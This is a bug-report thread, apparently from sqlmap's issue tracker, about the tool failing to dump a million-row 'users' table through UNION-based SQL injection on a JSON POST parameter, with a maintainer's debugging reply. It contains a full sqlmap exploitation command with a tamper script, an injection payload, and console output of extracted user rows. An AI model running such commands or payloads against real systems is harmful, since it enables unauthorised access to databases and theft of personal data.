You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Bug Description
Sqlmap is failling to dump/parse a large table ( 1 million row ) after a successful JSON response using UNION injection.
Command : py sqlmap.py -u "https://targeturl.com" --data={"id":"55*"} --method POST -p id --technique=U --code 200 --union-cols=19 --union-char=589 --dbms=MySQL --timeout 100000 -D bigdb -T users --dump --proxy="http://127.0.0.1:8886" --no-escape --prefix="" --tamper tscript.py --ignore-code=502 --fresh-queries -v 3
Expected behavior
I tried dumping a 80k rows table, and it was successful, but when I tried with the million row table it fails without showing any error and just skips over to dumping row by row.
Screenshots
Running environment:
sqlmap version : 1.6.11.7#dev ( latest )
Operating system: Windows 10
Python version : 3.7.4
Target details:
DBMS : MySQL
SQLi techniques : UNION based sql injection ( only )
no WAF
[21:48:18] [INFO] loading tamper module 'tscript'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
JSON data found in POST body. Do you want to process it? [Y/n/q] y
[21:48:19] [INFO] testing connection to the target URL
[21:48:25] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
Parameter: JSON #1* ((custom) POST)
Type: UNION query
Title: Generic UNION query (589) - 22 columns (custom)
Payload: {"id":"55 UNION ALL SELECT 589,589,CONCAT('qqjzq','nYoBkEKKvvZpWJYHbxuXaTIDFgKRlJnwrurjpwSC','qjvjq'),589,589,589,589,589,589,589,589,589,589,589,589,589,589,589,589-- -"}
[21:48:25] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:48:25] [INFO] testing MySQL
[21:48:32] [INFO] confirming MySQL
[21:48:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.12.2
back-end DBMS: MySQL >= 8.0.0
[21:48:32] [INFO] fetching columns for table 'users' in database 'bigdb'
[21:48:32] [INFO] fetching entries for table 'users' in database 'bigdb'
[21:54:22] [WARNING] large response detected. This could take a while
[21:54:34] [INFO] retrieved: '2021-11-29 10:01:46','1',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ','[email protected]',' ',' ',' ',' ',...
[21:54:40] [INFO] retrieved: '2022-11-29 10:01:29','1',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ','[email protected]',' ',' ',...
[21:54:46] [INFO] retrieved: '2022-11-29 10:01:05','1',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ','[email protected]',' ',' ',' ',' ','000...
The text was updated successfully, but these errors were encountered:
sqlmap doesn't like page responses greater than 100MB, while you have cca. 16MB here (so, there should be no issues from the low level perspective)
there is a possibility that content is trimmed or smth
I am missing the JSON payload in your console output (it would be shown with -v 3)
I would suggest you to rerun everything with -v3 -t traffic.txt and actually inspect the payload and content being sent. There is yuge possibility that content has been trimmed or tampered to contain non-parsable JSON stuff
one more thing. so, you are able to run Burp and take pictures, while not able to debug what's going on in request/response. honestly, i dislike this kind of issues because you just skipped your responsibility to find anything useful and jumped to the sqlmap issue pages
Bug Description
Sqlmap is failling to dump/parse a large table ( 1 million row ) after a successful JSON response using UNION injection.
Command : py sqlmap.py -u "https://targeturl.com" --data={"id":"55*"} --method POST -p id --technique=U --code 200 --union-cols=19 --union-char=589 --dbms=MySQL --timeout 100000 -D bigdb -T users --dump --proxy="http://127.0.0.1:8886" --no-escape --prefix="" --tamper tscript.py --ignore-code=502 --fresh-queries -v 3
Expected behavior
I tried dumping a 80k rows table, and it was successful, but when I tried with the million row table it fails without showing any error and just skips over to dumping row by row.
Screenshots

Running environment:
Target details:
The text was updated successfully, but these errors were encountered: